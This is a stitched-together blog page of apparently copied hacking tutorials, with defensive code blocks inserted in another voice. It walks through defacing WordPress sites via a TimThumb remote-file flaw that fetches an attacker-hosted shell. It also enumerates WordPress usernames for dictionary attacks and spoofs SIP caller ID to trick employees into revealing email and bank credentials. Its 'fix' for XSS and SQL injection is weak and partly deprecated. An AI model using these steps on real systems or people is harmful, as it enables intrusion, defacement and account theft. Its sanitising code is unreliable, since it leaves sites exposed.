How to Install Metasploit on Linux
This tutorial is How to Install Metasploit on Linux, but before we get into the steps it is better to first know what Metasploit is.
Metasploit is security software that is often used to test the resilience of a system by exploiting weaknesses in the system's software.
Metasploit was created by HD Moore in 2003 as a portable network tool written in the Perl scripting language. Later, the Metasploit Framework was completely rewritten in the Ruby programming language. On 21 October 2009 the Metasploit Project announced that it had been acquired by Rapid7, a security company that provides unified vulnerability management solutions.
Like comparable commercial products such as Immunity's Canvas or Core Security Technologies' Core Impact, Metasploit can be used to test computer systems for vulnerabilities in order to protect them, or to break into remote systems. Like many information security tools, Metasploit can be used for both legitimate and illegitimate activities. Since the acquisition of the Metasploit Framework.
Now you understand what Metasploit is, right? Let's move on to installing the application.
1. Download Metasploit.
Download Metasploit
2. Change the permissions to rwxr-xr-x
chmod +x metasploit.run
3. Run metasploit.run
./metasploit.run
Once step 3 is done, a wizard form like the picture below will appear.
Click Forward to go to the next step.
Select the radio button I accept the agreement, then click the Forward button.
Enter /opt/metasploit in the text input for the Metasploit installation folder.
Select the Yes radio button if you want the Metasploit service to start when your OS boots; if you don't want it to start automatically, select No. Then click the Forward button.
Set the SSL Port to 3790, then click the Forward button.
For Server Name enter "localhost", set Days of validity to 3650 and tick "Yes, trust certificate", then click the Forward button.
Then wait until the installation process finishes.
Once it is done, Metasploit is ready for you to use.
That was a short tutorial from M-Supian.ID on how to install Metasploit on your Linux OS. If there is a mistake in this tutorial or you have a question, please leave a comment below.
Deface Tutorial With TimThumb 1.14
Okay, before we learn this exploit I want to explain that timthumb is a bug that is present in every wordpress website, more precisely in a website's "theme",,,
Example: themes/optimizepress/timthumb.php < now if you see text like this "
no image specified
Query String :
TimThumb version : 1.19
it means it's vuln ;) ,, and the other thing you need to know is the TimThumb version.
So the targets we can exploit are timthumb versions 1.14 up to 1.32 ,, Got it? :) If not, just follow the tutorial :) ,, Let's go..
Tools and materials:
1. A subdomain that incorporates one of the following websites
: picasa.com
: blogger.com
: flixr.com
there are actually 5 but I don't remember them all U,u ,, for example " flxr.com.yourwebsite.com/shell.php "
, and before that you first have to upload a shell to your subdomain, in the public_html / httpdocs / www / or similar directory..
2. Brains and never giving up ;) ..
Exploit:
1. This time I already have my own target ,, see the picture..
2. Then add your subdomain at the end of the url like this " ?src=http://www.flixr.com.yoursubdomain.com/shell.php " < like that mate ;) ,, not clear enough? see the picture..
3. Look at the picture, at that point it's " Game Over " ;) .. now just open the shell; where it says " Unable to open image :" you open the shell by copying the md5 from before, for example " /cache/c89de71219ef668b7642e43e04d5d4df.php " still not clear? see the picture..
4. Now paste it into the url so it becomes " http://namatarget.com/wp-content/themes/optimizepress/cache/c89de71219ef668b7642e43e04d5d4df.php " , see below ,,
5. Done :D ,,, that's how it looks when I didn't upload a shell to the subdomain but just an uploader ,,
hehe sorry, the uploader belongs to pak deb~X ,,
Source : Extreme Crew
post taken from HERE
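The look-alike host in the post works only because the thumbnailer's allow-list check accepts any host that merely contains a trusted name. As an added example, not from the post and not TimThumb's own code, here is a reconstruction of that flawed check beside the check a maintainer would write instead: parse the URL, require http or https, and accept only the trusted domain itself or a genuine subdomain of it. The trusted list and the function names are assumptions for the example.

```php
<?php
// Added example (not TimThumb's code): a substring allow-list beside an exact-host allow-list.

$trusted = ['flickr.com', 'picasa.com', 'blogger.com'];   // assumed trusted image hosts

// Reconstruction of the flawed idea: accept any host that merely contains a trusted name.
function flawed_is_allowed(string $url, array $trusted): bool
{
    $host = strtolower((string) parse_url($url, PHP_URL_HOST));
    foreach ($trusted as $site) {
        if (strpos($host, $site) !== false) {    // "flickr.com.attacker.example" contains "flickr.com"
            return true;
        }
    }
    return false;
}

// Fixed check: require http(s), then accept only the trusted domain itself
// or a real subdomain of it (host ends with ".trusted.domain").
function strict_is_allowed(string $url, array $trusted): bool
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;                            // no ftp://, file:// or similar
    }
    $host = strtolower(rtrim($parts['host'], '.'));
    foreach ($trusted as $site) {
        if ($host === $site || str_ends_with($host, '.' . $site)) {
            return true;
        }
    }
    return false;
}

// Constructed inputs: a real subdomain of a trusted host and the look-alike host from the post.
$urls = [
    'http://farm1.flickr.com/photo.jpg',
    'http://www.flickr.com.attacker.example/shell.php',
];
foreach ($urls as $u) {
    printf("%-50s flawed=%s strict=%s\n", $u,
        var_export(flawed_is_allowed($u, $trusted), true),
        var_export(strict_is_allowed($u, $trusted), true));
}
```

Even with a correct host check, a thumbnailer that fetches remote URLs should also verify that the fetched bytes are an image before writing them into a web-served cache directory.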
How to close XSS and SQL holes
As we know, SQL and XSS bugs are very common; even today there are still many sites with sql and xss bugs, all because developers are lazy about security in their websites.
This time I'll share how to close xss and sql holes; the purpose of this post is so that those who are just learning CRUD can get into the habit of closing sql and xss bugs.
I've already applied this xss and sql fix on my own site, but I'm still worried, because as time goes on there will surely be someone who can bypass it.
PHP Code:
    // Neutralise markup in user-supplied text before it is echoed back to the browser.
    public function anti_xss($data){
        //$data = htmlspecialchars($data);
        $data = htmlentities($data);                         // encode <, >, &, quotes and other HTML characters
        $data = strip_tags($data);                           // drop any tags that survive encoding
        $data = filter_var($data, FILTER_SANITIZE_STRING);   // strips tags again; deprecated since PHP 8.1
        return $data;
    }
The above is how to close an xss bug; if you are confused about where to put it, I'll explain below.
PHP Code:
    // Accepts only numeric ids: returns true for values such as "42", false for anything else.
    public function anti_sql($id){
        $id = is_numeric(htmlspecialchars($id));   // is_numeric decides; htmlspecialchars changes nothing for numeric input
        if($id){
            return true;
        }else{
            return false;
        }
    }
The above is OOP, so if you want to apply it in plain PHP just take the function from inside the public method.
Hope it is useful, and if anything is confusing, feel free to ask.
Source: post taken from the IndoXploit forum, posted by Logika Galau
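As an added example, not part of the original post, here is the approach the two helpers above are reaching for, written so it runs on its own: encode at the moment of output with htmlspecialchars, and pass every query value, numeric or not, as a bound parameter through PDO. It assumes PHP 8 with the pdo_sqlite extension; the table, rows and function names are constructed for the example.

```php
<?php
// Added example: encode at output time and bind every query value.
// Assumes PHP 8 with the pdo_sqlite extension (in-memory database, nothing to set up).

// Encode for an HTML body or attribute context when the value is printed, not on input.
function html_out(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Look a user up by id. The id is bound as an integer, so it is never spliced
// into the SQL text. anti_sql() above only says whether an id is numeric and
// gives no protection for string parameters; prepared statements cover both.
function find_user(PDO $db, string $rawId): ?array
{
    if (!ctype_digit($rawId)) {        // rejects "1 OR 1=1", "1;--", "" before any SQL runs
        return null;
    }
    $stmt = $db->prepare('SELECT id, name FROM users WHERE id = :id');
    $stmt->bindValue(':id', (int) $rawId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// A string parameter gets the same treatment: a bound value, never concatenation,
// so a quote inside it stays data instead of closing the SQL string.
function find_by_name(PDO $db, string $name): array
{
    $stmt = $db->prepare('SELECT id, name FROM users WHERE name = :name');
    $stmt->execute([':name' => $name]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Constructed demo data, including a stored name that carries a script tag.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)');
$db->exec("INSERT INTO users (id, name) VALUES (1, 'alice'), (2, '<script>alert(1)</script>')");

var_dump(find_user($db, '1'));                // the normal lookup
var_dump(find_user($db, '1 OR 1=1'));         // rejected by ctype_digit
var_dump(find_by_name($db, "' OR '1'='1"));   // no rows: the quote is data, not SQL
echo html_out(find_user($db, '2')['name']), "\n";   // the script tag is rendered as inert text
```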
How to Find Out Usernames on WordPress [Handy for Those Who Like BF]
This time I want to share how to find out usernames on WordPress.
I only found out about it myself yesterday after digging around in WPScan.
It's pretty simple.
Just add ?author=id
and the username + name will show up.
This time it only shows the username + name for ids 1-10.
If you want up to 20, just change $id inside the for loop.
POC:
So this only shows the ids that have a username + name.
Once you know the username, go ahead with a dictionary attack.
script:
http://pastebin.com/AqCmhr2Y
#KeepShare.
Post Copied From INDOEXPLOIT
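A loop over ?author=1..10 leaves a very recognisable trail in a web server's access log. As an added example, not part of the post above, here is a detector that groups ?author=N requests per client address and flags any client that walks several distinct ids within a short window. The log format (Apache combined style), thresholds, addresses and log lines are constructed for the example.

```php
<?php
// Added example: flag clients sweeping ?author=N on a WordPress site (constructed Apache-style log).
const MIN_DISTINCT_IDS = 5;   // this many different author ids ...
const WINDOW_SECONDS   = 60;  // ... within this many seconds counts as a sweep

// Parse one log line into [ip, time, id] if it is a ?author= probe, else null.
function parse_author_probe(string $line): ?array
{
    if (!preg_match('/^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|HEAD) (\S+) /', $line, $m)) return null;
    $query = parse_url($m[3], PHP_URL_QUERY);
    if (!is_string($query)) return null;
    parse_str($query, $q);
    if (!isset($q['author']) || !is_string($q['author']) || !ctype_digit($q['author'])) return null;
    $ts = DateTime::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    return $ts ? ['ip' => $m[1], 'time' => $ts->getTimestamp(), 'id' => (int) $q['author']] : null;
}

// Return ip => sorted author ids for every client whose probes form a sweep.
function find_author_sweeps(array $lines): array
{
    $byIp = [];
    foreach ($lines as $line) {
        if (($p = parse_author_probe($line)) !== null) $byIp[$p['ip']][] = $p;
    }
    $flagged = [];
    foreach ($byIp as $ip => $probes) {
        usort($probes, fn($a, $b) => $a['time'] <=> $b['time']);
        for ($i = 0, $n = count($probes); $i < $n; $i++) {
            $ids = [];   // distinct ids inside the window that starts at probe $i
            for ($j = $i; $j < $n && $probes[$j]['time'] - $probes[$i]['time'] <= WINDOW_SECONDS; $j++) {
                $ids[$probes[$j]['id']] = true;
            }
            if (count($ids) >= MIN_DISTINCT_IDS) {
                $flagged[$ip] = array_keys($ids);
                sort($flagged[$ip]);
                break;
            }
        }
    }
    return $flagged;
}

// Constructed sample: one client walking ids 1-6 within seconds, one ordinary visitor.
$log = [];
for ($id = 1; $id <= 6; $id++) {
    $log[] = sprintf('203.0.113.9 - - [10/Oct/2023:13:55:%02d +0000] "GET /?author=%d HTTP/1.1" 301 0', $id, $id);
}
$log[] = '198.51.100.4 - - [10/Oct/2023:14:02:10 +0000] "GET /?author=1 HTTP/1.1" 301 0';
$log[] = '198.51.100.4 - - [10/Oct/2023:14:02:12 +0000] "GET /about/ HTTP/1.1" 200 5120';
print_r(find_author_sweeps($log));   // only the sweeping client is listed
```

Blocking or redirecting ?author= requests at the web server or in a plugin stops the username disclosure itself; the detector still tells you who tried.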
Learn How Elliot from Mr. Robot Hacked into His Therapist's New Boyfriend's Email & Bank Accounts (Using Metasploit)
Social engineering is a pretty important item in a hacker's toolkit.
In Mr. Robot there was a scene where Elliot used social engineering to gain access to his therapist's boyfriend's email and bank accounts: he called him pretending to be someone from his bank and asked for information that was really useful for getting into his account. The target believed he was talking to the bank and gave Elliot the information he was looking for.
But How Is It in the Real World?
Gathering information about a target remotely is easy, but learning about the person behind the screen matters too. You can't always get that information by googling or by using websites that offer information about people or institutions; sometimes you have to get it directly from the user. In the real world, Bazzell said, most breaches we hear about start with social engineering, and they usually occur through a malicious email or by tricking an employee. That is what we are going to learn today.
What Are We Going to Do?
Today I'm going to show you how you can trick an employee into giving you all the info needed to successfully hack the company, using Metasploit and a softphone.
Introduction to SIP and VoIP
Due to its increasing reliability and accessibility, internet telephony has in recent years become a plausible choice for many businesses, allowing them to cut their communication costs while enjoying a rich communication experience.
SIP and VoIP provide the foundations for IP telephony. Both provide ample benefits and opportunities for the user to save money while increasing productivity. Each protocol has pros and cons, and they are often used together.
All of us have at least once in our lives been in an office and noticed one or more landline telephones, mainly in the customer service area. These days most companies no longer use those landlines; instead they have adopted IP phones (SIP, VoIP), which are sometimes free (Skype) and can be reached from anywhere in the world. All you need is a public SIP address that follows you much like your email address would: it doesn't matter where you are or what device you use, as long as you're logged in (registered), SIP communications will be redirected to your current location.
Session Initiation Protocol (SIP) is a powerful and efficient communications protocol that can be used to send multimedia messages to multiple parties, allowing people around the world to communicate over the internet using their computers and mobile devices.
Voice over IP (VoIP) is a methodology and group of technologies for the delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet.
For more info about these protocols, google them in case you don't understand them.
REAL WORLD EXAMPLE
For this example we are going to use Google as the target company (you could swap in the name or domain of your target company or entity), a softphone as our VoIP phone (also called an IP phone), and Metasploit to create a fake SIP INVITE request that makes the targeted device ring and display fake caller ID information, because in the real world users only believe a caller they trust (though for some people you don't even need all of this).
Before we start: a softphone is a software program for making telephone calls over the Internet using a general-purpose computer rather than dedicated hardware. It can be installed on a workstation, portable computer, tablet or even a cellphone and lets the user place and receive calls without an actual telephone set, and it is available for Linux too. Enough theory for today; fire up your Kali Linux and install the softphone:
apt-get install sflphone-gnome
As you can see from the pic below, I have already installed the softphone; skip this step if you have it too.
Once the installation is done you can find the softphone by navigating through Applications ---> Usual Applications ---> Internet; just click the icon to open it (lol, I bet you already know how to open programs).
When you open it for the first time you will be prompted with a screen like the one below; for now just set everything as shown and click Next.
Now that the phone is on your screen, go to Edit --> Accounts ---> choose "ip2ip", click Edit and choose Advanced.
Under Network Interface choose your network interface and leave the port at the default; in my case I'm using eth0 as the interface, but you can choose any.
For now we are done configuring our IP phone.
The Hack
We will be using Metasploit to hack our softphone; this is intended for users who know how to use Metasploit.
The module we will use will create a fake SIP invite request making the targeted device ring and display fake caller id information.
The commands:
msfconsole
use auxiliary/voip/sip_invite_spoof
To see the options (please don't copy it, it's not a command; it is just there to save time)
Understanding the Module
DOMAIN is the SIP domain; in our case, as we will be working locally, we can just skip it. It could be something like google, wonderhowto or any other, as long as they have a SIP domain.
EXTENSION is the target's identity inside the network; a SIP record does the same thing as a mail exchange record does for email. Say the SIP domain is google: the extension of a target could be something like voice.john@google.com.
MSG is the spoofed caller ID to send; in our case we will pretend we are from Google's IT department.
RHOSTS is the target IP; in my case my softphone is installed on my localhost with the IP 192.168.0.101.
SRCADDR is the spoofed calling SIP address; in our case it will be voice.admin@google.com, to make the target (an employee of Google in our case) think the call is coming from Google's IT department.
When we run it we receive a call apparently coming from Google's IT department, but it is just a spoofed identity, as we can see from the pic below.
Of course it's rare for you to get this working on Google, but you can try it on other companies or entities; all you need is their VoIP IP address, or you can be on the same network and scan for IPs with the following ports open: 5060, 5070, 10000-65535, the default ports for a lot of VoIP services.
You can see that our softphone uses port 5060.
Another thing you could do is send an invitation to every IP on the network; you just need to set RHOSTS to a range of IPs on the target network, in my case it could be
Once it finds an IP running SIP on 5060 it sends an invitation, as you can see from the pic above; this time we sent an invitation across the network.
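What makes this work is that the phone trusts whatever the From header of an unauthenticated INVITE says. As an added example, not part of the original article, here is a check a defender could run at a SIP proxy or over captured traffic: it parses an INVITE, pulls the From URI, and flags a call whose From domain claims to be our own SIP domain while the packet arrived from an address that is not one of our known endpoints. The domain follows the article's scenario; the trusted addresses, the INVITE text and the function names are constructed assumptions.

```php
<?php
// Added example: flag a SIP INVITE whose caller identity claims our own domain but which
// did not arrive from an endpoint we know. Domain, addresses and the INVITE are constructed.
const OUR_SIP_DOMAIN = 'google.com';                  // the domain the article's scenario spoofs
$trustedSources = ['192.168.0.10', '192.168.0.11'];   // assumed: our registered phones and PBX trunk

// Split a raw SIP message into its request method and a lowercase-keyed header map.
function parse_sip(string $raw): array
{
    $lines = preg_split("/\r\n|\n/", trim($raw));
    $method = strtok(array_shift($lines), ' ');
    $headers = [];
    foreach ($lines as $line) {
        if ($line === '') break;                       // blank line ends the headers
        [$name, $value] = array_pad(explode(':', $line, 2), 2, '');
        $headers[strtolower(trim($name))] = trim($value);
    }
    return [$method, $headers];
}

// Pull user and host out of a From/To header such as: "IT Dept" <sip:voice.admin@google.com>;tag=1
function sip_uri_parts(string $header): ?array
{
    if (!preg_match('/sips?:([^@>;\s]+)@([^>;\s]+)/i', $header, $m)) return null;
    return ['user' => $m[1], 'host' => strtolower($m[2])];
}

// Return a reason string when the INVITE looks like a spoofed internal caller, otherwise null.
function check_invite(string $raw, string $srcIp, array $trustedSources): ?string
{
    [$method, $h] = parse_sip($raw);
    if (strtoupper($method) !== 'INVITE' || !isset($h['from'])) return null;
    $from = sip_uri_parts($h['from']);
    if ($from === null) return 'INVITE with an unparseable From header';
    $claimsOurs = $from['host'] === OUR_SIP_DOMAIN || str_ends_with($from['host'], '.' . OUR_SIP_DOMAIN);
    if ($claimsOurs && !in_array($srcIp, $trustedSources, true)) {
        return sprintf('%s@%s claims our domain but the INVITE came from %s', $from['user'], $from['host'], $srcIp);
    }
    return null;
}

// Constructed INVITE of the kind the module sends: spoofed From, sent straight to the phone.
$invite = "INVITE sip:john@192.168.0.101 SIP/2.0\r\n"
        . "Via: SIP/2.0/UDP 192.168.0.55:5060;branch=z9hG4bKabc\r\n"
        . "From: \"Google IT Department\" <sip:voice.admin@google.com>;tag=1234\r\n"
        . "To: <sip:john@192.168.0.101>\r\n"
        . "Call-ID: 1@192.168.0.55\r\nCSeq: 1 INVITE\r\nContent-Length: 0\r\n\r\n";
var_dump(check_invite($invite, '192.168.0.55', $trustedSources));   // unknown source: flagged
var_dump(check_invite($invite, '192.168.0.10', $trustedSources));   // one of our phones: not flagged
```

Requiring registration and digest authentication on the phones and PBX, rather than accepting direct IP-to-IP calls as the "ip2ip" account above does, removes most of this class of call before any such check is needed.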
What Now? How Can I Get Someone's Email or Bank Account Passwords with This?
Now it's all about social engineering: once the user accepts the call, do your best to trick him into giving you the info you are looking for.
In our example using Google you could say that you are currently working on a new security app for Google employees and would like to update the employee's data; with more time you can figure out exactly what to say to gain access to their account, because they will think you work in Google's IT department. They might or might not give you the info, but it's all about good talking.
Just like Elliot did, we could call the target's bank and pretend we are from the IT department and would like some info about a user (our target), and so on...
That's all for now; if I made any mistake or you would like to add your opinion, such as how you would trick the employee, you are welcome...
See you soon and happy hacking...
Post Copied From Null Byte